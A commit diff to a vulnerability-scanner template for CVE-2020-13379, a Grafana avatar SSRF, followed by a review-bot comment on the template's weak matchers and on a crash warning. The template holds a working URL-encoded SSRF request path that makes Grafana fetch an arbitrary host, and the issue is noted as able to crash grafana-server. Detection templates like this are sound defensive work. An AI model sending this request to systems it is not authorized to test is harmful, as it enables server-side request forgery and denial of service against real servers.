Update CVE-2020-13379.yaml

patch-1
joeldeleep 2020-09-27 12:44:17 +05:30 committed by GitHub
parent f83e33f78f
commit aa50c7370d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 7 deletions


@ -5,7 +5,7 @@ info:
author: pxmme1337
severity: medium
description: The avatar feature in Grafana 3.0.1 through 7.0.1 has an SSRF Incorrect Access Control issue. This vulnerability allows any unauthenticated user/client to make Grafana send HTTP requests to any URL and return its result to the user/client.
# Source:- https://www.exploit-db.com/exploits/48638
# WARNING
# This vulnerability results in complete crashing of the grafana-server application.
@ -15,10 +15,7 @@ requests:
path:
- '{{BaseURL}}/avatar/test%3fd%3dredirect.example.com%25253f%253b%252fbp.blogspot.com%252f
matchers:
- type: status
status:
- 200
- type: word
words:
- "image/jpeg"
part: header
words:
- "image/jpeg"
part: header
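Review bot: The header word matcher on `image/jpeg` at the end of `matchers:` is too weak to confirm this SSRF on its own, because an avatar endpoint can plausibly return that content type for ordinary requests too, so patched hosts may be reported as vulnerable (inferred; the server-side handler is not shown here). The rendering has lost the `+`/`-` column, so it is unclear whether the `status: 200` matcher survives this commit. If it was dropped, I would keep it, join the checks with `matchers-condition: and`, and add a body matcher for content that only the redirect target returns. The `# WARNING` comment in the first hunk says the issue can crash grafana-server; if this request can trigger that, the caveat is worth repeating in `description:` so operators see it in scan output before running the template against production. The `requests:` entry begins above the second hunk, so an existing `matchers-condition` there would not be visible.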